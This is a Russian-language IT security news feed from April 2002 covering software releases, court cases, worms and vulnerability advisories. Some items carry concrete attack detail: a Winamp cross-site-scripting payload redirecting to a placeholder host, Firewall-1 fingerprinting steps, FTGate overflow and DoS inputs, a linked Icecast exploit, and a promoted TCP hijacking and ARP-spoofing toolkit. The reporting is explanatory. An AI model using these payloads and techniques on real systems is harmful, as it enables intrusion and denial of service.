В Японии появился новый суперкомпьютер, скорость которого в пять раз выше, чем у предыдущего лидера. Своим появлением компьютер обязан японским специалистам из промышленной корпорации HNSX Supercomputers. Конструкция нынешнего рекордсмена, носящего название NEC Earth Simulator и предназначенного для анализа и обработки данных об изменениях климата на планете, перспектив глобального потепления и других катаклизмов, имеет в своем составе 5 104 процессора и достигает скорости 35 600 миллиардов математических операций в секунду. Японские специалисты утверждают, что это число составляет лишь 87% от предполагаемой скорости NEC Earth Simulator. Источник: http://www.compulenta.ru/2002/4/21/28654/
20/04/2002 Hunt Project это набор сетевых утилит для сетевых администраторов и хакеров.
Достаточно просто перечислить некоторые функции этой программы: - connection management * setting what connections you are interested in * detecting an ongoing connection (not only SYN started) * Normal active hijacking with the detection of the ACK storm * ARP spoofed/Normal hijacking with the detection of successful ARP spoof * synchronization of the true client with the server after hijacking (so that the connection don't have to be reset) * resetting connection * watching connection - daemons * reset daemon for automatic connection resetting * arp spoof/relayer daemon for arp spoofing of hosts with the ability to relay all packets from spoofed hosts. * MAC discovery daemon for collecting MAC addresses * sniff daemon for logging TCP traffic with the ability to search for a particular string - host resolving * deferred host resolving through dedicated DNS helper servers. - packet engine * extensible packet engine for watching TCP, UDP, ICMP and ARP traffic * collecting TCP connections with sequence numbers and the ACK storm detection. - misc. * determining which hosts are up - switched environment * hosts on switched ports can be spoofed, sniffed and hijacked too Скачать программу можно здесь: http://lin.fsid.cvut.cz/~kra/index.html#HUNT Другие программы, схожие с Hunt Project можно посмотреть здесь: ftp.uinc.ru Или здесь: ftp2.uinc.ru
19/04/2002 FreeBSD basics. Туториалы на английском. Но т.к. язык простой - то почитать стоит. Разбор команд, примеры всякие, утилиты и пр. Что привлекает - в оглавлении это подается в большинстве своем как решение какой-то задачи - например, работа с текстом, добавление пользователя, доступ к Cisco маршрутизатору и т.д. В принципе, все это есть в больших книгах по юниксу. Ну а вот тут - прямо в онлайне.
Туториалы: http://www.onlamp.com/pub/ct/15 Источник: Cooler
19/04/2002 Этические хакеры.
На сайте BBS News появилась заметка о индийском хакере, авторе книги "Ethical Hacking". Сам герой статьи относит себя к "этическим хакерам" (ethical hacker), которых в США, а теперь и в Индии, крупные компании используют для защиты своих сетей от компьютерных преступников. Источник: http://news.bbc.co.uk/hi/english/world/south_asia/newsid_1934000/1934874.stm
19/04/2002 Книга Стивена Леви "Хакеры, герои компьютерной революции" переведена на Русский.
Прочитать ее теперь можно здесь: http://www.cooler.it/hackers/
18/04/2002 У нашей команды появился дополнительный ftp сервер. .
В связи с высокой нагрузкой на наш главный ftp сервер, специально для вас был установлен второй ftp сервер, который поможет разгрузить главный и позволит скачивать файлы в любое время. Второй сервер находится по адресу: ftp2.uinc.ru
17/04/2002 Серьезная уязвимость в программе анализа лог-файлов Webalizer.
В программе Webalizer, используемой для анализа log-файлов web-серверов и являющейся частью дистрибутива Red Hat Linux 7.2, обнаружены проблемы с безопасностью, связанные с переполнением буфера в функции, которая определяет доменные имена по IP адресам. По умолчанию данная функция отключена, но при ее использовании удаленный пользователь получает возможность доступа к атакуемой системе с правами root. Подробности: http://www.bezpeka.com
17/04/2002 Новая версия Интернет-червя "KLEZ".
Лаборатория Касперского" сообщает об обнаружении новой модификации Интернет-червя "KLEZ" (Klez.h), многочисленные сообщения о случаях заражения которым получены из многих стран, включая Японию, Китай, Австрию, Чехию. Для проникновения на компьютеры червь использует брешь в системе безопасности Internet Explorer ("IFRAME-брешь"). Благодаря этому червь имеет способность незаметно заражать компьютеры сразу же после прочтения получателем инфицированного письма. Эта особенность практически исключает человеческий фактор и многократно повышает эффективность заражения и скорость распространения червя. Подробности: http://www.kaspersky.ru/news.html?tnews=1008&id=578070 Информация о "Klez": http://www.viruslist.com/viruslist.html?id=4415
17/04/2002 На суде Microsoft было предложено создать MS Office для Linux.
Один из свидетелей со стороны обвинения на судебном разбирательстве по делу о монополизме Microsoft предложил в качестве одной из мер пресечения незаконной деятельности компании выпуск офисного пакета Microsoft Office для работы под управлением операционных систем, отличных от Windows и Mac OS. Подробности: http://www.compulenta.ru/news/2002/4/17/28476/
17/04/2002 ПО Intel для удаленного управления домашней сетью.
Исследователи компании Intel разработали новый программный пакет на базе технологии UPnP, с помощью которого владельцы сотовых телефонов и карманных компьютеров смогут управлять домашними сетями, причем делать это можно будет, находясь как внутри жилища, так и вне его. Подробности: http://www.compulenta.ru/news/2002/4/17/28487/
17/04/2002 Вышел второй выпуск журнала x.25 zine.
Содержание: *X.25 protocol hijacking (rus/eng) *QnX *Rosnet sniffing (rus/eng) *Обнаружение по действию *Motorola Vanguard *Борьба с отладчиками под Linux *Just demomaking *Scanner on NONblocking sockets *Light on! *Опять о IRC *from XAOC3: **Active Network 2 **Clone CDMA phone standart **Shutdown **Raw Socket programming mini how-to Скачать - http://www.x25us.net/x25zine2.zip
17/04/2002 Выход Ickle-0.3.0.
16-ое апреля ознаменовалось выходом новой версии популярного клона ICQ для Linux. Список нововведений: * Added support for Authorisation Requests * Support for `user added you' requests * Support for your own away message * Predefined away messages * More icon sets * SMTP delivery of SMS messages where required * Title and icon indication of messages on the main ickle window, and on contact windows. * Better handling of when a message is 'read' * Statistics for contacts in user info * Whitepage searches (detailed, UIN and Keyword) * Invisibility * Auto-away on idle time * Retrieving/setting own info * About box * gcc 3.0 fixes - message history problems mainly * Urgent and `To Contact List' delivery modes * Sorting of contact list * Extensively more Settings (Direct connection control, Servers, Logging.. ) * More README * Registering new UINs and a Wizard to help too * Spell checking in Message box (with ispell/aspell) Скачать - http://prdownloads.sourceforge.net/ickle/ickle-0.3.0.tar.gz Сайт программы - http://ickle.sourceforge.net/
16/04/2002 Новая статья на сайте OSP.
В этой статье описываются основы электронной цифровой подписи. Прочитать: http://www.osp.ru/pcworld/2002/03/078.htm
16/04/2002 Компания Novell выигрывает у пиратов иск на сумму 500000 долларов.
Компания Novell, занимающаяся сетевыми решениями, объявила об успешном завершении дела против американской компании Computer Recyclers of Orem. В мае 1998 года компания Novell подала в суд иск против Computer Recyclers и ее главного владельца Тима Берда из-за нарушения авторских прав и прав на торговую марку. В качестве ответчиков по делу фигурировали также три работника компании Computer Recyclers. Подробности: http://compulenta.ru/2002/4/16/28326
16/04/2002 В Аргентине хакеры неподсудны.
В Аргентине суд оправдал хакерскую группу X-Team, поскольку деятельность хакеров там не считается незаконной. Как ни парадоксален данный факт, однако аргентинская Конституция основана на "запретительном принципе", который означает, что разрешено все, что не запрещено специальным законом. Подробности: http://compulenta.ru/2002/4/16/28416
16/04/2002 ElcomSoft и DMCA.
Федеральный окружной судья Рональд Уайт (Ronald Whyte) сообщил, что намерпен к 6-му мая вынести решение по двум прошениям защиты об отмене дела как такового, на основании, в частности, нарушением уголовными статьями DMCA 1-й поправки к Конституции США, а также того, что ElcomSoft вообще не находится под юрисдикцией США. Если дело не будет признано недействительным, видимо, тогда же будут определены сроки следующего судебного заседания по этому делу. Подробности: http://www.linuxcenter.ru/news/#969
15/04/2002 Golden Telecom испытывает трудности.
Одна из крупнейших коммуникационных компаний России сегодня все утро испытывает трудности Сегодня с утра большинство пользователей Рунета испытывают трудности с доступом к сайтам, которые размещены на площадках «Голден Телекома», одной из самых крупнейших коммуникационных компаний России. В частности, не было доступа к сайтам рейтингов Top.Mail.Ru и Spylog, т.к. все сервера сбора статистики этих рейтингов расположены в «Голден Телекоме». Рейтинг Top.Mail.Ru заработал ближе к 11 часам утра, спустя 30 минут заработал и Spylog. Подробности: http://www.webplanet.ru/article/751.html
15/04/2002 InnoTek выпускает средства запуска Windows и Linux в среде OS/2 и самой OS/2 в среде Windows.
Компания InnoTek разработала средство для запуска любой операционной системы (Linux, Windows и пр.) внутри операционной системы производства IBM - OS/2. Пакет Virtual PC for OS/2 позволяет работать с приложениями других операционных систем внутри OS/2 с сохранением всех их возможностей. Разработчики утверждают, что сохраняются и все возможности работать с сетевыми приложениями. Подробности: http://compulenta.ru/2002/4/15/28023
15/04/2002 Google выпускает инструменты для работы с поисковыми машинами.
Компания Google выпустила набор программных интерфейсов (API) для разработки поисковых машин и систем работы с ними. Сервисы, реализованные с помощью этих API, используют уже принятые стандарты SOAP и язык WDSL и поддерживают работу практически во всех средах интернет-программирования - Java, Perl, Visual Studio.Net. Подробности: http://compulenta.ru/2002/4/15/28251
13/04/2002 Появился первый вирус для ERP-системы SAP R/3.
Интернет-издание Newsbytes сообщило о появлении SAPvir - первого в мире вируса, поражающего компьютеры, обслуживающие систему комплексного управления предприятиями SAP R/3. Код вируса написан на языке Advanced Business Application Programming (ABAP), используемом в приложениях SAP, и состоит всего лишь из 24 строк. Согласно предварительному анализу, проведенному независимым консультантом по решениям SAP Йохеном Хайном (Jochen Hein), никаких деструктивных действий в вирус не заложено. Хайн также обнаружил в коде SAPvir несколько ошибок, из-за которых вирус может поражать далеко не все платформы SAP. В то же время, по словам Хайна, программа на ABAP может выполнять любые действия вплоть до искажения или удаления данных, оставаясь при этом абсолютно незамеченной. Подробности: compulenta.ru
12/04/2002 WLAN - разрушительная технология.
По данным обзора компании IDC, беспроводные локальные сети, в частности, предназначенные для рынка SOHO, являются "разрушительной" технологией. Их влияние на сетевую индустрию сравним с эффектом влияния мобильных телефонов на телекоммуникационную промышленность. Подробности: compulenta.ru
12/04/2002 Вышел SuSE Linux 8.0.
После полугода разработок в SuSe Labs появилась очередная версия SuSe Linux. Источник: SuSe
11/04/2002 Перл: серьезная ошибка в модуле SOAP Lite Модуль SOAP Lite содержит серьезную ошибку, а именно - способ реализации вызовов методов в сочетании с некоторыми внутренними деталями устройства Perl приводят к возможности вызова любой перловой подпрограммы на стороне SOAP Lite сервера. Эксплойт, дающий shell access к такому серверу, требует минимальных усилий. Так как проблема еще не решена, лучше всего остановить любые серверные приложения, использующие SOAP Lite, пока не появится фикс. Подробности - http://www.linuxcenter.ru
11/04/2002 KDE 3.0 Review.
Вышел первый обзор, посвященный нововведениям в KDE 3. Подробности - http://www.linuxplanet.com/linuxplanet/reviews/4138/1/
11/04/2002 Kernel Traffic #161.
Вышел новый номер Internet журнала Kernel Traffic. Ознакомиться - http://kt.zork.net/kernel-traffic/kt20020407_161.html
11/04/2002 RedHat будет называть "дыры" своими именами.
Red Hat Inc. заявила, что отныне все объявления и обновления, касающиеся безопасности, будут использовать термины, стандартизованные проектом CVE (Common Vulnerabilities and Exposures), поддерживаемым MITRE Corporation. В то же время Марк Кокс, старший директор по инженерным решениям в Red Hat, был принят в Совет Директоров CVE, став тем самым первым представителем Open Source компании в проекте. По мнению основателей и участников проекта, общий язык описания проблем безопасности, определяемый словарем проекта, позволяет снизить затраты разнообразных производителей и пользователей ПО на понимание и исправление обнаруженных ошибок и "дырок". Источник - http://www.linuxcenter.ru
11/04/2002 Госдума приняла в первом чтении законопроект, вносящий изменения в ст.146 УК РФ по вопросу об уголовной ответственности за нарушение авторских и смежных прав.
В документе говорится, что присвоение авторства (плагиат), если это деяние причинило крупный ущерб автору или правообладателю, наказывается штрафом в размере от 200 до 400 МРОТ или в размере зарплаты или иного дохода осужденного за период от 2 до 4 месяцев, либо обязательными работами на срок от 180 до 240 часов, либо арестом на срок от 3 до 6 месяцев. Источник: rbc.ru
11/04/2002 Microsoft выпускает «критический» секьюрити-патч для IIS.
В среду Microsoft выпустила «критический» секьюрити-патч для своего ПО веб-сервера, устраняющий 10 новых лазеек, через которые хакеры могут получить полный контроль над компьютерами с установленной программой Internet Information Server (IIS). Три поправки Microsoft называет критическими для всех трех версий IIS и одну — для IIS 4 и 5. Другим новым уязвимостям присвоен средний или низкий уровень опасности. В прошлом подобные лазейки в широко распространенном ПО приводили к тому, что многие веб-серверы подвергались атакам, например, червя Code Red. Подробности: http://www.zdnet.ru/?ID=185433
11/04/2002 Компания Belkin представила новые устройства серии SafeTech, защищающие от хищения ноутбуков.
Компания Belkin, занимающаяся производством компьютерной периферии и аксессуаров, представила новые устройства для защиты от хищения дорогостоящей компьютерной техники, включая ноутбуки, жидкокристаллические мониторы и стыковочные модули. Подробности: http://www.compulenta.ru/news/2002/4/11/28216/
10/04/2002 FreeBSD 5.0 Developer Preview #1.
Cреди новшеств - - переработанная поддержка SMP; - support for sparc64; - device filesystem; - ffs snapshots and background fsck; Подробности - http://www.freebsd.org/releases/5.0R/DP1/relnotes.html
10/04/2002 Slackware 8.1.
Согласно информации на www.slackware.com, скоро выйдет Slackware 8. Долгожданный релиз будет "снабжен" ядром 2.4.18, поддержкой ext3, reiserfs, jfs и xfs), а так же glibc-2.2.5. Источник - http://www.linux.org.ru
9/04/2002 Обновление tcpdump для RedHat.
Прошло обновление пакета tcpdump и сопутствующие пакеты (libpcap, arpwatch) дистрибутива RedHat. Обновление связано с проблемами безопасности (возможность удалённого входа рутом и т.д.). tcpdump обновлён (в RPM) до 3.6.2-10.6, libpcap - 0.6.2-10.6, arpwatch - 2.1a11-10.6. Ccылка на обновления - http://bugzilla.redhat.com/bugzilla
8/04/2002 Sendmail 8.12.3.
Вышла очередная версия одного из старейших MTA - sendmail 8.12.3. Изменения в основном касаются безопасности. Перечень изменений - http://www.sendmail.org/8.12.3.html
8/04/2002 TimeGuard 0.1 - программа, блокирующая доступ к ПК в определенное пользователем время.
TimeGuard 0.1 - маленькая утилита, которая позволяет блокировать доступ к компьютеру в указанное время. Для того чтобы разблокировать компьютер, нужно будет ввести пароль, указанный при включении блокировки. TimeGuard 0.1 можно настроить на автоматический запуск вместе с Windows. Имеется возможность указать в параметрах программы определенные часы, в течение которых доступ к компьютеру будет запрещен, например, с 14:40 до 15:30. Блокировка может производиться как автоматически (в указанное пользователем время), так и вручную - нажатие на кнопку "Старт" блокирует доступ к компьютеру. Программа распространяется на условиях лицензии Shareware и имеет русский интерфейс. Cкачать можно отсюда - http://www.opersoft.nm.ru/TimeGuard/TimeGuard.zip
8/04/2002 Статья "THE SECURE PROGRAMMING STANDARDS METHODOLOGY MANUAL".
Продолжая тему предыдущей новости, хотелось бы привести ссылку на статью Victor A. Rodriguez (Bit-Man) (тоже, кстати, из Аргентины) о методах написания безопасных программ и приложений. Сатья рассматривает основные аспекты компьютерной безопасности, типы атак (Stack smashing, Format String bug, Remote compromise, Resource retention), инструменты для отладки пограмм и проверки их на типичные уязвимости (Flawfinder, ITS4, LCLint, StackGuard, FormatGuard, RSX, PageExec, Libsafe), и примеры написания безопасных программ. Рекомендуется для прочтения программистам. К сожалению, статья доступна только на английском и испанском языках, хоть ссылка на русский предусмотрена. Статья - http://uk.osstmm.org/spsmm.htm
8/04/2002 Статья "Bug Hunting: The Seven Ways of the Security Samurai".
В апрельском номере электронного журнала IEEE Computer Magazine (в журнале рассаматриваются различные аспекты компьютерной безопасности) опубликована довольно любопытная статья. Автор её Ivan Arce, основатель и глава информационной компании по компьютерной безопасности Core Security Technologies, R&D офисы которой размещены в Аргентине. Статья посвящена методам и способам поиска прорех в безопасности программ и программных продуктов. Автор (как следует из названия статьи) указывает на семь способов поиска "багов", к которым относятся: 1. Исследование исходного кода. Подобный метод также специалисты называют RTFS (read the fine sources). 2. Реверс-инжениринг: отладка и дизассемблирование. 3. Реверс-инжениринг: анализ сетевого траффика. 4. Тестирование безопасности программы как "чёрного ящика". 5. Метод грубой силы (brute force). 6. Анализ работы программы "сверху-вниз". 7. Сбор подробной информации. Статья - http://www.computer.org/computer/sp/articles/arc/index.htm
7/04/2002 Обзор ФС Ext3.
Очередной обзор популярной файловой системы Ext3. Ознакомиться - http://www.linuxplanet.com/linuxplanet/reports/4136/1/
7/04/2002 Выход Apache 2.0.35.
Вышел первый релиз Apache 2. Среди нововведений радуют глаз поддержка легковесных процессов (unix threads), фильтры (фактически поддержка последовательно выполняющихся хендлеров), новые модули в поставке (mod_dav, mod_ssl) и многое другое. По данным http://www.linux.kiev.ua/
6/04/2002 Новая статья на FreshMeat.
В статье описываются причины (в том числе и человеческий фактор) появления прорех в системах безопасности, и мерах их устранения. Статья: Preventive Security
6/04/2002 Больше ли свобод принесет изменение Windows XP?.
По условиям соглашения об урегулировании антимонопольного иска, этим летом Microsoft должна внести в Windows ХР ряд изменений – в интересах пользователей и для усиления конкуренции. Однако некоторые непримиримые борцы с монополией и конкуренты Microsoft убеждены, что эти изменения не пойдут слишком далеко. Уже в будущем месяце Microsoft планирует начать тестирование сервисного пакета Windows XP Service Pack 1, а релиз должен выйти в конце лета. Известно, что в апдейт войдут поддержка беспроводных устройств Mira и цифровой медиаинтерфейс Freestyle. Но еще важнее то, что он обеспечит потребителям и производителям ПК возможность отключить почти полудюжины так называемых промежуточных технологий, интегрированных в Windows ХР. Это предусмотрено соглашением Microsoft с Министерством юстиции США и девятью из 18 штатов, подавших антимонопольный иск против софтверного гиганта. Подробности: zdnet.ru
6/04/2002 Microsoft просит пересмотреть решение суда о слове Windows.
Microsoft обратилась в суд Сиэтла с просьбой пересмотреть принятое им в марте категоричное решение, согласно которому слово Windows является родовым термином и корпорация не может иметь эксклюзивных прав на него. Постановление принято в ответ на попытки Microsoft помешать компании, которая разрабатывает операционную систему на базе GNU/Linux и использует термины Lindows.com (название компании) и LindowsOS (название будущей ОС). «Суд постановил, что Lindows.com доказала обоснованность своего протеста по поводу законности торговой марки Windows», — сказал тогда судья Джон Кохенор (John C. Coughenour). Подробности: zdnet.ru
5/04/2002 Новая статья на NewsForge.
На сервере newsforge.com появилась новая статья, посвященная работе с файловыми системами dev и proc. Статья - http://newsforge.com/newsforge/02/04/03/2151246.shtml?tid=23
5/04/2002 Сайт Microsoft переходит с Unix на Windows и зависает.
30-миллионная рекламная кампания была организована софтверным гигантом совместно с компанией Unisys. Последняя создала специальный веб-сайт, также посвященный распространению идеи о превосходстве Windows над Unix. Позже выяснилось, что "антиюниксовый" сайт работает под управлением Unix. На сайте Netcraft, предоставляющем такого рода информацию, было выяснено, что сайт работает на базе операционной системы FreeBSD и веб-сервера Apache для Unix. При этом на сайте без стыда и совести доказывался тот факт, что Unix - это "операционная система, заставляющая вас каждый день решать проблемы с сервером в самом сложном окружении из существующих". Источник - http://www.linuxcenter.ru
5/04/2002 "Лаборатория Касперского" представляет новую версию продуктов для защиты информационных сетей.
"Лаборатория Касперского", ведущий российский разработчик систем информационной безопасности, сообщает об официальном выпуске новой версии продуктов семейства Антивируса Касперского: Business Optimal 4.0 и Антивируса Касперского Corporate Suite 4.0. Антивирус Касперского Business Optimal 4.0 был разработан специально для борьбы с вирусами всех типов в информационных сетях предприятий малого и среднего масштаба. Данное антивирусное решение учитывает все возможные потребности в антивирусной безопасности, решая три главные задачи: обеспечение комплексной антивирусной защиты, внедрение мощных средств централизованного управления и оптимизация затрат на приобретение необходимого ПО. Подробное описание продуктов - http://www.kaspersky.ru/news.html?id=502415
5/04/2002 Украина лидирует в списке e-commerce мошенничеств .
Американская корпорация ClearCommerce, занимающаяся разработкой систем защиты для онлайновых платежей, провела исследование, в ходе которого ею были опрошены порядка 1100 компаний-торговцев на предмет выявления фактов онлайнового мошенничества. База исследования в общем оставила 6 миллионов сделок с 40 тысячами клиентов. Полученные данные представляют немалый интерес с точки зрения географии мошенничеств. ClearCommerce вывела три top-листа. В первом показаны процентные доли мошенников в тех или иных штатах США. Во втором списке - самые благополучные страны (наименьший процент мошенничеств). Первые три места в нем заняли Австрия, Новая Зеландия и Тайвань. В третьем списке - самые неблагополучные страны (наибольший процент мошенничеств). Первое место в этом списке заняла Украина, второе - Индонезия, третье - Югославия. Источник - http://www.bezpeka.com/
5/04/2002 Возможность переполнения буфера в ядре Windows NT/2000/XP.
Как сообщает NSFOCUS Security Team, была обнаружена возможность переполнения буффера в ядре ОС Windows NT/2000/XP. Уязвимость связана с работой драйвера MUP ( Multiple UNC Provider). Переполнение буффера в ядре в данном случае может привести к перезагрузке системы, либо к получению прав SYSTEM локальным атакующим. Приведём краткое описание уязвимости. Когда приложение посылает UNC-запрос (вида \\ip\sharename) для доступа к файлам на удалённом хосте, ОС передаёт запрос для обработки MUP, который, в свою очередь, передаёт запрос различными редиректорам, последовательно перебирая их, в зависимости от обратного ответа. Работа MUP в ядре управляется при помощи драйвера mup.sys. При приёме UNC-запроса MUP сначала сохраняет его в буффере ядра, имеющего размер = "длина запроса UNC" + 0x1000 байт. Если длина запроса больше 0x1000 байт, существует возможность перезаписи данных в памяти за пределами буффера. Атакующий получает возможность модифицировать содержимое памяти ядра и после освобождения памяти выполнить свой код. В зависимости от различных условий это приводит либо к перезагрузке системы, либо к получению локальным пользователем прав SYSTEM. В некоторых случаях возникал знакомый ещё со времён winnuke "синий экран". Microsoft выпустила бюллетень по безопасности (MS02-017) и патч для устранения уязвимости. В базе данных CVE уязвимости присвоен индекс CAN-2002-0151. Бюллетень по безопасности от Microsoft - http://www.microsoft.com/technet/security/bulletin/MS02-017.asp Патч для WinNT 4.0 - http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37630 Патч для WinNT 4.0 Terminal Server Edition - http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37652 Патч для Win2K - http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37555 Патч для WinXP - http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37583
5/04/2002 Группа хакеров предлагает на своем сайте услуги по взлому компьютеров на заказ.
Группа американских хакеров объявила на своем сайте о приеме заказов на взлом компьютеров, сообщает Newsbytes. Список услуг хакеров достаточно велик, а одной из наиболее интересных возможностей является взлом компьютеров образовательных учреждений с целью исправления плохих оценок. Видимо, участники хакерской группы, известной под названиями Be A Hacker (BAH) и 69 Hacking Services, считают это направление одним из наиболее перспективных. Во всяком случае, именно "хакерское" исправление оценок рекламируется в бегущей строке на главной странице сайта BAH. Как сообщил журналистам Newsbytes один из главарей 69 Hacking Services Akbar "Andy" Hooda, взлом вузовского компьютера обойдется заказчику в 2100 долл., причем 799 долл. необходимо уплатить вперед, и эти деньги не возвращаются, если взлом совершить не удастся. Среди других услуг BAH можно отметить взлом паролей к почтовым ящикам и веб-сайтам (от 399 долл.), взломы сайтов и компьютеров частных фирм и государственных структур (от 850 долл.) и распространения разного рода хакерских программ. По словам Худы, группа уже обслужила около 80 клиентов, заработав 6000 долларов. По данным системы PayPal, которая используется BAH для осуществления платежей, с хакерами были заключены, по меньшей мере, 27 сделок. Сайт группы - http://www.beahacker.com/
5/04/2002 Microsoft тестирует первый Service Pack для Internet Explorer 6.
Зарегистрированные бета-тестеры компании Microsoft получили для исследования новую версию первого набора исправлений Service Pack 1 для браузера Internet Explorer. Версия имеет номер IE 6 SP1 build 2800.1005. В данном обновлении должны быть решены проблемы с безопасностью, обнаруженные до настоящего времени. Кроме того, по сообщениям бета-тестеров, в Internet Explorer 6 SP 1 изменены некоторые функции. Как утверждается, это также сделано с целью повышения безопасности. Источник - http://www.neowin.net
5/04/2002 Microsoft требует изменить судебное решение по торговой марке Lindows.
Компания Microsoft выразила протест против решения суда, которое позволило компании Lindows продолжать разработку операционной системы на базе Linux под торговой маркой LindowsOS. Ранее компания Microsoft подала в суд на Lindows, требуя от нее прекращения использования "торговой марки, которая может ввести пользователя в заблуждение". Однако, суд не только не принял аргументы Microsoft, но и выразил сомнение в легитимности использования общеприменимого слова Windows в качестве торговой марки. Подробности - http://www.compulenta.ru/news/2002/4/4/27898/
4/04/2002 Удалённое переполнение буффера в Icecast.
Icecast-потоковый MP3-сервер (www.icecast.org) для поддержки музыкальных файлов Windows и UNIX. В версии 1.3.11 найдена уязвимость, позволяющая, при посылке клиентом специально сформированного GET запроса (более 8000 байт), выполнить на сервере код с привилегиями суперпользователя. Тестировались: SuSE 7.2, Debian 2.2r2, Slackware 8.0. Выпущен эксплоит. Сегодня опубликован патч. Заключается в добавлении стрёх строк в исходник client.c: if (strlen(expr) > 8000) { write_log(LOG_DEFAULT, "WARNING: expr greater than 8000--possible BOF attack?"); return;} Эксплоит - http://packetstorm.linuxsecurity.com/0204-exploits/icx.c
4/04/2002 Удалённое переполнение буффера в IRIX.
Существует возможность переполнения буффера в SNMP-демоне ОС IRIX. Тестировались версии SGI IRIX 6.5-6.5.15m и 6.5.15f (более старые релизы SGI сейчас не поддерживает). Сервер SNMP запускается в IRIX По умолчанию и с полномочиями рута. Таким образом, возможность переполнения буффера при помощи специальным образом построенного SNMP-запроса даёт возможность атакующему выполнить на удалённой машине код с полномочиями суперпользователя. SGI Inc. выпустила патч за номером 4574. Также рекомендуется фильтровать на файрволлах внешние запросы к портам 161 и 1161 TCP/UDP. База данных патчей от SGI - http://support.sgi.com/spk/
4/04/2002 Переполнение буффера и DoS в FTGate PRO/Office.
3APA3A и Илья Тетерин aka buggzy обнаружили уязвимости в FTPGate PRO/Office, позволяющие провести атаки типа переполнение буффера и DoS. FTPGate PRO/Office-это почтовый сервер для Windows, поддерживающий SMTP/POP3-протоколы от Floositek Ltd (www.floositek.com). Переполнение буффера возможно при выполнении после соединения к серверу команды: APOP USER , где составляет приблизительно 1-2К. DoS возможен при посылке множественных Rcpt to: в SMTP-сессии. При этом происходит утечка памяти и 100% загрузка процессора. При использовании нескольких запросов POP3 USER почтовый ящик пользователя блокируется. Подробности - http://www.security.nnov.ru/search/news.asp?binid=1884
4/04/2002 Клиент Windows 2000 DCOM может пропускать важную информацию по сети.
Уязвимость, найденная в Windows 2000 DCOM, позволят посылать произвольные части памяти DCOM клиента в открытом виде. Данные могут содержать, как и безопасную информацию, подобно блоку среды процесса, таи и очень важную информацию, включая пароли. Когда клиент делает запросы на сервер, он сначала соединяется с сервером. Т.е. он должен сообщить серверу, что требуется использовать RPC интерфейс. Первый раз, когда он это делает на данном подключении, происходит 'bind' запрос на сервер. Если клиент хочет использовать дополнительные интерфейсы с тем же самым подключением, он может сделать запрос 'alter context' на сервер. Из-за природы DCOM, клиенты обычно делают множество запросов 'alter context' за все время активного подключения. Проблема состоит в том, что запросы 'alter context', в дополнение к посылке надлежащих данных запроса, содержат большой блок пространства памяти клиента. Дополнительные данные содержат примерно 1000 байтов, и обычно игнорируются сервером. Однако, эти данные содержат потенциально важную информацию в сеть. В некоторых случаях, в этих данных могут содержаться важные пароли в открытом виде. Пример: На W2K SP1, запустите пустой mmc.exe. Добавьте в WMI Control snap-in. Конфигурируйте его для соединения с другим компьютером, и используйте ' Log on as' диалог, чтобы определить мандаты. Затем просмотрите свойства от удаленной машины. Эта операция пошлет пароль пользователя в открытом виде. DCOM трафик не ограничен никаким специфическим портом, но обычно используются порты 135, и динамические порты от 1024 до 5000. Уязвимость найдена в Windows 2000sp2. Microsoft включила патч от этой уязвимости в Windows 2000 SRP1 (Security Rollup Patch 1). Перевод с исправлениями и добавлениями взят отсюда - http://SecurityLab.ru/?ID=29915 W2K Security Rollup Patch 1 - http://www.microsoft.com/windows2000/downloads/critical/q311401/default.asp
4/04/2002 Уязвимости в Cisco Secure ACS webserver.
Cisco Security ACS (Access Control Server) имет вэб-сервер, который слушает на 2002 порту. Этот порт обслуживается модулем CSADMIN и обеспечивает удалённое администрирование сервера. Существует возможность посылки специально построенного запроса, в результате которого модуль "падает". Это связано с уязвимостью типа "формат строки" в csadmin_fmt.a. При этом возможна перезапись регистра EIP. Так как модуль запускается с правами администратора, возникает возможность выполнения несанкционированного кода на сервере. Вторая уязвимость связана с возможностью просмотра содержимого удалённых файлов типа html, htm, class,jpg, jpeg, gif за пределами webroot. Правда, при этом атакующий должен знать точное местонахождения файла (просмотр всей директории невозможен). Уязвимости подвержены только версии продукта для Windows. Unix версия не уязвима. CISCO выпустила патчи. Тестировались версии Cisco Secure Access Control Server for Windows 2.6.x и ACS 3.0.1 (build 40). Подробное описание - http://www.cisco.com/warp/public/707/ACS-Win-Web.shtml
4/04/2002 Возможность определения Firewall-1 в сети.
Существует возможность определения на удалённой машине установленного брандмауэра Firewall-1. Подобная технология может быть включена в сканеры, определяющие тип удалённой ОС на основе технологии "fingerprints" (подобная технология была описана Fyodor-ом-cоздателем знаменитого сканера nmap). Firewall-1 можно определить двумя способами. Первый из них был описан ещё в прошлом году. Заключается он в том, что при утановленном брандмауэре этого типа открыты порты 256,257 и 258. Вчера был опубликован ещё один способ. Необходимо подсоединиться к порту 257, ввести ENTER, ввести 2-3 символа, опять нажать ENTER. При этом сервер ответит строкой fwa1. В ответе на это сообщение указывается, что в документации на Firewall-1 рекомендуется включать брандмауэр в "Stealth Rule", который блокирует весь траффик к файрволлу, но по умолчанию этот режим отключён. Ссылка по теме - http://online.securityfocus.com/archive/1/18701
4/04/2002 Возможность выполнения Cross-Site-Scripting в Winamp.
Cтудент из Швеции Andreas Sandblad обнаружил уязвимость типа Cross-Site-Scripting (CSS) при использовании популярного MP3-плеера Winamp. В комплект этого программного продукта включён собственный минибраузер, предназначенный для просмотра информации (title/artist/album) о песне через Интернет. При этом миниброузер при помощи тегов типа ID3v1/ID3v2 в MP3-файле перенаправляется на URL http://info.winamp.com/winamp/WA.html?Alb=&Art=LoveProject&Cid=winamp&Tid=&Track=Brick. Проблема заключается в том, что этот сайт не фильтрует HTML-теги "<",">", что делает возможность вставить код перенаправления в запросе (CSS-уязвимость). Для осуществления подобной атаки необходимо в Winamp открыть "File Info" cменить тип IDv1 на IDv1 (поскольку IDv2 ограничивает длину 32 байтами), вставить в поле альбома HTML-код вида: <mp3 id=m src=http://ANYURL><script>location=m.src</script>. При этом на самом деле миниброузер перенаправляется на сайт http://ANYURL. В сочетании с уязвимостями, обнаруженными в IE и Oulook подобная уязвимость представляет довольно большую опасность. Необходимо отметить, что после опубликования этой уязвимости Gracenote (компания, которая отвечает за поддержание сервера, к которому обращается минибраузер) тут же ответила в BUGTRAQ и лично автору, что они устранили эту опасную "особенность", введя фильтр. Источник - http://www.securityfocus.com
4/04/2002 KDE 3.0.
Сегодняшний день ознаменовался выходом 3-ей версии популярного менеджера окон. Скачать - ftp://ftp.kde.org/pub/kde/stable/3.0
